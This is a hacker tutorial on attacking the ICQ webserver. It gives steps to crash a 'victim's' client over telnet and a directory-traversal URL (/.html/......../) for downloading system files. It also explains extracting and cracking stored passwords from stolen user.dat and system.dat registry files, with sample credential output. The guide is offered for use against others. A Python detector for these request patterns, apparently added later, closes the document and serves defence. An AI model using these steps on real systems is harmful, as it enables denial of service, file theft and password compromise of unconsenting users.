ICQ Homepage Exploit
By Shadow51

Ever wondered why there is a little house beside the name of some people? That doesn't mean they are at home, it means they have the ICQ-Webserver running. The idiots who made it left huge bugs in it, like you can close their ICQ remotely, and even download their files. The only problem is that you can't see the files, so you have to know what you're downloading.

To close the ICQ client:

1. Click on the start button
2. Click on RUN
3. Type Telnet 123.123.123.123 80
   Of course replace the 123.123.123.123 by the IP of the victim (note that this bug only works on build 1700 and maybe a few others but I'm not sure).
4. Press ENTER
   Wait until it connects
5. Type QUIT
   Wait about 10 seconds. If they go offline that means it worked, if not, then it didn't work.

Now suppose you want to get some of their files. Let's say that you want to see the file c:\windows\win.ini, and he or she has the ICQ-Webserver on:

1. Go to your browser
2. Type http://123.123.123.123/.html/......../windows/win.ini
   Note that you need the /.html/ part. It will trick the server into believing it's an html file. Also note that there are 8 dots /......../ (that means it goes back 4 dirs). If the user's ICQ dir is not in a standard place, it can cause problems, but 95% of the time it's in c:\progra~1\icq\
3. Press ENTER in your browser
   It will simply ask you where you want to save the file, then you save it and do whatever you want with it.

Now this is not all you can do. There are much better things with this exploit, like getting the user's password files and registry. If you are a lamer, I suggest you go and play with what you just learned, and stop reading now cause this is a bit too complicated for you :P.

Okay, so you want to have the registry and all the passes. Before you do this, I warn you that if the user you're hacking is not using the same version of Windows you are using, you could end up with a lot of problems. Suppose you have Win98 and they have Win95: it won't work. An easy way to make sure it's the same version is to download their command.com with the exploit, and compare the size with your command.com. There are many other ways, but this is a good one.

1. Get 2 files:
   http://123.123.123.123/.html/......../windows/user.dat
   and
   http://123.123.123.123/.html/......../windows/system.dat
   Remember to change the IP when you're done.
2. Copy them in a directory.
3. Make a backup copy of your c:\windows\user.dat and c:\windows\system.dat
   You're gonna want to have them back when you're done.
4. Restart your computer
5. Press F8 just before it boots up
6. Choose "Command Prompt Only"
7. Delete your current user.dat and system.dat and replace them with the ones from the guy you hacked
8. Reboot your computer
9. Just before it boots, press F8 several times; choose safe mode.
10. Once booted in safe mode, click on start
11. Click on RUN
12. Type regedit
13. Press ENTER
14. Once in Regedit, click on the menu "Registry", then choose "Export Registry File..."
15. Save the file, then get yourself a Password Cracker
16. If all goes well, you now have all the user's passwords. It should look something like this:

    crypt_Blizzard_Storm : öA@N
    www.mircosoft.com : Administration:PASSWORD
    *Rna\Dan\dannyk : q34ad6gt
    *Rna\Test\957935 : nar8s7yj
    *Rna\Test2\wolves : cyal8r
    *Rna\Test3\curtisph : q73vnrht
    *Rna\My Connection\USERNAME : PASSWORD
    *Rna\My Connection 3\USERNAME : PASSWORD

17. Reboot
18. Press F8 at startup
19. Choose "Command Prompt Only"
20. Replace user.dat and system.dat with your originals that you previously had backed up

Shadow51
29000000
Shadow51@writeme.com
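The two request shapes described above (a bare QUIT sent to port 80, and a path carrying an all-dots segment such as /......../) can be recognised on the server or proxy side before any file is opened. The check below is an added example, not code from the original text or from ICQ; the function names and the sample request lines are constructed for illustration, and it also covers percent-encoded dots, which the text does not mention.

```python
import re
from urllib.parse import unquote

# A path segment made only of dots, two or more ("..", "........"),
# climbs out of the served directory; a single "." is harmless.
DOT_RUN = re.compile(r"^\.{2,}$")
# Minimal HTTP/1.x request line: method, target, version.
REQUEST_LINE = re.compile(r"^(GET|HEAD|POST) (\S+) HTTP/1\.[01]$")

def classify_request(line):
    """Return 'ok', 'malformed' or 'traversal' for one raw request line."""
    m = REQUEST_LINE.match(line.strip())
    if m is None:
        return "malformed"  # e.g. a bare "QUIT" typed over telnet
    path = m.group(2).split("?", 1)[0]
    # Decode percent-escapes until stable so %2e%2e and double
    # encoding are normalised before the segment check.
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    # Windows accepts both "/" and "\" as separators.
    segments = re.split(r"[\\/]", path)
    if any(DOT_RUN.match(s.rstrip(" ")) for s in segments):
        return "traversal"
    return "ok"

def scan(lines):
    """Classify every request line; returns (line, verdict) pairs."""
    return [(l, classify_request(l)) for l in lines]

# Constructed sample input, not captured traffic.
SAMPLE = [
    "GET /index.html HTTP/1.0",
    "GET /.html/......../windows/win.ini HTTP/1.0",
    "GET /.html/%2e%2e/%2e%2e/windows/user.dat HTTP/1.0",
    "QUIT",
    "GET /files/report.v1..2.txt HTTP/1.1",
]

if __name__ == "__main__":
    for line, verdict in scan(SAMPLE):
        print(f"{verdict:10} {line}")
```

A server should reject or drop the connection on anything other than 'ok' rather than passing the path to the filesystem; dots inside an ordinary file name are left alone.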